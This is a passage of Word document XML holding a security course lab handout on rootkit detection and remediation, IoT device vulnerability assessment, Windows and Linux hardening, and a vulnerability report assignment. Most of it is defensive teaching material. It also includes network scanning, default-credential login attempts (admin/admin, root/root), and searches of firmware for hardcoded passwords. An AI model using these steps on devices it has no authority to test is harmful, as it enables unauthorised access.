    <w:p w14:paraId="10137C2B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installation process and modifications made</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568F3D16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rootkit persistence across reboots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50274910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system behavior changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2ABD03" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Detection Using Multiple Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A1D989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chkrootkit: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14230E26" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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chkrootkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE2962F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rkhunter: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A83C66" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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rkhunter --check --skip-keypress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B21FF28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Analyze system files for modifications: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02465CCE" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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-la /bootstat /sbin/init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6062F1F2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running processes for anomalies: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE8CA13" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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 auxnetstat -tulpn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D20BB" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Memory and Behavioral Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFD7A01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network connections: </w:t>
      </w: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netstat -tulpn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103E4A90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loaded kernel modules: </w:t>
      </w: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lsmod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BF33C1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Monitor system calls: </w:t>
      </w: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strace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02314ADC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startup services and cron jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381181EF" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B28785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Reboot into single-user mode or from live USB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6605ADB0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critical data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E537DF" w14:textId="345DA264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filesystem scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9D0DF3" w14:textId="745D3ACB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Wipe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filesystem and reload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OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2CF600" w14:textId="61FA8F2A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Restore data from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verified clean backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E63CDD" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Post-Remediation Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B99C1C" w14:textId="185A70F0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 detection tools to confirm removal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA6D65B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system behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7A4862" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D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system integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2037C3F3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Deliverables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16650DC8" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Rootkit analysis documentation (behavior, persistence mechanisms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCE7697" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Detection tool outputs (chkrootkit, rkhunter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A85CE4" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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dumps or process lists showing rootkit artifacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A006F18" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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remediation procedure documented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB2C482" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Post-remediation verification screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E29926F" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="003015EA" w:rsidP="00AD0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015E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4507E5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BE372AE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Activity 6: IoT/Embedded Device Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB36C8F" w14:textId="41341838" w:rsid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Assess </w:t>
      </w:r>
      <w:r w:rsidR="006C321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posture of embedded devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E7D064" w14:textId="5C7801BE" w:rsidR="00464FFD" w:rsidRPr="00464FFD" w:rsidRDefault="00464FFD" w:rsidP="00464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color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD082D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00464FFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Proceed with this lab activity only if you have IoT devices around you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6591F571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Activity Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B81D4FB" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Device Inventory and Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED46E5C" w14:textId="5AF8F156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List all embedded devices available in </w:t>
      </w:r>
      <w:r w:rsidR="00464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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269A9CB6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device type, manufacturer, model, and firmware version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147AAB11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known vulnerabilities (CVEs) for each device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41016073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Prioritize devices by criticality and vulnerability severity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDDFB3C" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFC1660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Scan device network ranges: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F311CD" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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-sV 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFED6C4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open ports and services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0181E942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 default credentials or known weak authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDE4A76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accessible interfaces (web, SSH, Telnet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDB87A1" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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 Credential Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF0D1F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Attempt login with common default credentials: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D72BBD" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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admin/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B5C475" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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admin/password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3E8B55" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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root/root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D73F2A6" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1430C20B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successful authentications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D90DDAA" w14:textId="39773D3D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 </w:t>
      </w:r>
      <w:r w:rsidR="00464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lack of credential change prompts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2994890B" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Firmware Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425A2D02" w14:textId="7634744A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Extract firmware from </w:t>
      </w:r>
      <w:r w:rsidR="00464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device or download from </w:t>
      </w:r>
      <w:r w:rsidR="00464FF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manufacturer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187D808B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Analyze firmware contents: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B90DAB" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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binwalk firmware.binstrings firmware.bin | grep -i password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534E234D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hardcoded credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AD1411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vulnerable libraries or known exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E7BAE0" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F8F006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for common vulnerabilities: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1D0F6B" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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 SSH/Telnet instead of encrypted access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E52B4C" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Unencrypted data transmission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBB01FC" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Lack of authentication for sensitive functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4818A8" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082D">
      <w:pPr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Outdated or unpatched software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE6C563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findings with severity levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322F576F" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Exploitation (Authorized Lab Only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3A0986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Attempt exploitation of identified vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168C4F78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Gain administrative access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD176C1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access method and impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C57A84" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Recommendations and Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFA00D4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default credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FEADEA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 unnecessary services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7962CF3C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firmware to latest version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB519D8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segmentation recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AD66C8" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4CF566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026F35BB" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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inventory and prioritization matrix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6CFB28" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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scan results with vulnerability mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EC1E87" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Credentials tested and success rates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075BE84E" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Firmware analysis findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEBA1D8" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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assessment report with CVSS scores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ACCD6F" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Remediation recommendations and implementation status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0551FFCF" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="003015EA" w:rsidP="00AD0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015E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F0C449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5CF4B91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Activity 7: OS Hardening Exercise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C92C952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 comprehensive hardening measures on Windows and Linux systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56425236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Difficulty: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Intermediate to Advanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4958D289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Windows Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F91A157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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E78310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 unnecessary services (fax, print spooler, SSDP, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9BCB6A" w14:textId="6D156BFF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Windows Defender and update definitions</w:t>
      </w:r>
      <w:r w:rsidR="007E6F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D769BD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Windows Firewall with inbound/outbound rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16005566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 ports 137-139 and 445 against SMB and null session attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D8E673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UAC appropriately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0D8CB1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BitLocker encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDB1DA5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and restrict user permissions using NTFS ACLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000D1764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Windows Update for automatic patching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1146FFA5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AppLocker for application control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCA05C7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and configure Windows Event Log collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404C8A90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security group policies via gptedit.msc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536C93E6" w14:textId="26C28758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 </w:t>
      </w:r>
      <w:r w:rsidR="007E6F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Guest account and </w:t>
      </w:r>
      <w:r w:rsidR="007E6F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Administrator account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0772B361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no accounts with blank passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56583507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strong password policies (minimum 8 characters, complexity requirements)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F72E81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Enable account lockout thresholds and duration policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BFBFFC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 LM Hashes to prevent legacy password attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58351E6E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file integrity checking tools like Tripwire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DD53C8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NTFS usage (not FAT) for ACL support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE3CFC3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for and remove Alternate Data Streams (ADSs) hiding malicious files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A636D9" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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and restrict Remote Procedure Call (RPC) access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E92CF7D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Verification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412ED224" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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security baseline compliance tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C407FDA" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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before/after security posture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1175A0B2" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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system functionality post-hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A27F9D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Linux Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0697A8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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F4D7E8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all available security updates and patches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0BAAE3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 unnecessary services and daemons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A78482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firewall (ufw or firewalld) with iptables rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539331FD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SELinux or AppArmor mandatory access controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F18AAE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SSH hardening (disable root login, change default port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6211E5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unnecessary SUID binaries: </w:t>
      </w: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 / -perm -4000 -type f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1655727C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sudo with least privilege using </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD08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visudo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6715AEED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auditd logging for system monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E4968F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fail2ban for intrusion prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D70CB55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disk encryption (LUKS) for sensitive partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B355E7D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 bash_history file permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69769662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appropriate file permissions on all system files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0574178E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file integrity with AIDE or Tripwire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B84FEB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 or remove Trojan-susceptible services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DEC017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user awareness training documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7C0467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vulnerability scanners (OpenVAS) for ongoing assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C1B94A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no blank passwords on system accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEE0581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SELinux or AppArmor policies for critical services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4255F37D" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Subscribe to security advisory lists for your distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766AE324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Verification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D98C905" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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configuration compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6964C936" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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disabled services and confirm they don't restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A881B52" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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firewall rules function correctly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328CF88C" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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logs for suspicious activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6527F1F1" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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OpenVAS or other vulnerability scanners to verify hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487997A5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7BBB80C3" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Hardening checklist with completion status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6347A14A" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Before/after configuration comparisons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0375D0" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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compliance scan results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CB95E9" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Security audit report documenting improvements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E42F452" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="003015EA" w:rsidP="00AD0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015E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4B1604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9A3BE31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Assignment: OS Vulnerability Assessment Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C40D74" w14:textId="159D838A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Conduct </w:t>
      </w:r>
      <w:r w:rsidR="007E6F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comprehensive vulnerability assessment on a system and document findings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70797032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operating system evaluation covering Windows, Linux, or embedded devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD20FA4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Report Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAF12EA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Executive Summary (1-2 pages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D75A374" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Assessment scope and objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450C6A23" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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findings summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0850A81F" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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impact overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194E53DA" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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priorities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF39A93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Vulnerability Inventory (2-3 pages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587DE513" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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 list of discovered vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C9E47D" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Severity classification (Critical, High, Medium, Low)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4F8068" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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CVSS scores and CVE references</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FDC5F5" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Affected systems and services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A04058" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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Exploitability assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D11881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Detailed Findings (4-6 pages)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vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A5F0F8" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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 and technical details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411A3E59" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Exploitation method and proof-of-concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D6B786" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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impact and business risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164B4555" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Affected configurations and versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AF8373" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Remediation steps and timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4852CE1C" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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References to CVE database entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB9E143" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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specific Windows vulnerabilities (unquoted service paths, DLL hijacking, insecure permissions, RPC issues, etc.) or Linux vulnerabilities (SUID binaries, sudo misuse, stored passwords, etc.) as applicable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1503A00F" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD082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any password-related vulnerabilities or authentication weaknesses discovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47201553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Hardening Recommendations (2-3 pages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DEDBA2" w14:textId="77777777" w:rsidR="00AD082D" w:rsidRPr="00AD082D" w:rsidRDefault="00AD082D" w:rsidP="00AD08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Patching schedule and methodology</w:t>
      </w:r>
    </w:p>
